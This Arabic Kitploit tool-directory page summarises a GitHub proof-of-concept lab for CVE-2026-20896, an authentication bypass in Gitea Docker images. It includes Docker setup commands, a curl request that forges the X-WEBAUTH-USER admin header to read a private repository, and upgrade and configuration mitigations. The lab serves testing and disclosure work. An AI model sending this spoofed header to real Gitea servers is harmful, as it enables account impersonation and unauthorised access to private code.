Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/yym8538/cve-2026-20896
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقةمختبرات وتدريب عملي
GitHubyym8538/cve-2026-20896

CVE-2026-20896

مختبر إثبات مفهوم وسكربتات Python/cURL توضح CVE-2026-20896، وهو تجاوز للمصادقة في صور Gitea Docker الرسمية عبر ترويسة X-WEBAUTH-USER.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20896: تجاوز المصادقة في صورة Gitea Docker - إثبات المفهوم

[!WARNING] استخدم إثبات المفهوم هذا فقط في مختبر محلي أو ضد نظام مصرّح لك صراحةً باختباره.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

نظرة عامة

CVE-2026-20896 هو تجاوز للمصادقة في صور Gitea Docker الرسمية المتأثرة. عند تمكين مصادقة الوكيل العكسي (reverse-proxy)، فإن الإعداد REVERSE_PROXY_TRUSTED_PROXIES = * الذي تولّده الصورة يسمح لعميل قادر على الوصول إلى الواجهة الخلفية لـ Gitea بانتحال هوية مستخدم موجود عبر ترويسة X-WEBAUTH-USER.

ينشئ المختبر مسؤولاً باسم gitea-admin بكلمة مرور عشوائية ويخزّن CVE-2026-20896_AUTH_BYPASS_CONFIRMED في المستودع الخاص gitea-admin/private-proof. قراءة ذلك الملف دون معرفة كلمة مرور المسؤول العشوائية تُثبت تجاوز المصادقة.

الإصدارات المتأثرة

الفئةالإصدار
المتأثرةصور gitea/gitea Docker الرسمية ≤ 1.26.2
أول إصدار مُصحّح1.26.3
الموصى به1.26.4 أو أحدث

يتطلب الإعداد المتأثر تمكين مصادقة الوكيل العكسي وأن تكون الواجهة الخلفية لـ Gitea قابلة للوصول مباشرةً، أو أن يحافظ وكيل upstream على ترويسة الهوية التي يوفّرها المهاجم. لا حاجة إلى حاوية وكيل عكسي لإعادة الإنتاج المحلية هذه.

البيئة

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

انتظر بضع ثوانٍ حتى تتم تهيئة Gitea ومستودع الإثبات الخاص.

إثبات المفهوم

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

يؤدي الاستغلال الناجح إلى إرجاع CVE-2026-20896_AUTH_BYPASS_CONFIRMED.

Python

python poc.py http://127.0.0.1:3000

يقارن السكربت الطلبات غير المصادَق عليها، وغير الخاصة بالمسؤول، والطلبات المزوّرة الخاصة بالمسؤول، ويطبع VULNERABLE عند تأكيد تجاوز التفويض. يتطلب Python 3.10 أو أحدث ويستخدم المكتبة القياسية فقط.

التأثير

  • انتحال هوية مستخدمي Gitea المعروفين أو القابلين للتخمين
  • وصول غير مصرّح به إلى المستودعات الخاصة وموارد المستخدمين
  • تنفيذ إجراءات إدارية عند انتحال هوية حساب مسؤول

التخفيف

  • الترقية إلى Gitea 1.26.3 أو أحدث؛ ويُوصى بـ 1.26.4 أو أحدث.
  • تقييد REVERSE_PROXY_TRUSTED_PROXIES على عناوين الوكلاء الموثوقين.
  • منع الوصول المباشر إلى الواجهة الخلفية لـ Gitea واستبدال ترويسات الهوية الموفّرة خارجياً.
  • تعطيل مصادقة الوكيل العكسي عند عدم الحاجة إليها.

التنظيف

docker stop cve-2026-20896-gitea-vuln

المراجع

  • Gitea Security Advisory GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 and 1.26.4 release announcement
  • Gitea security fix PR #38151
تنزيل الأداة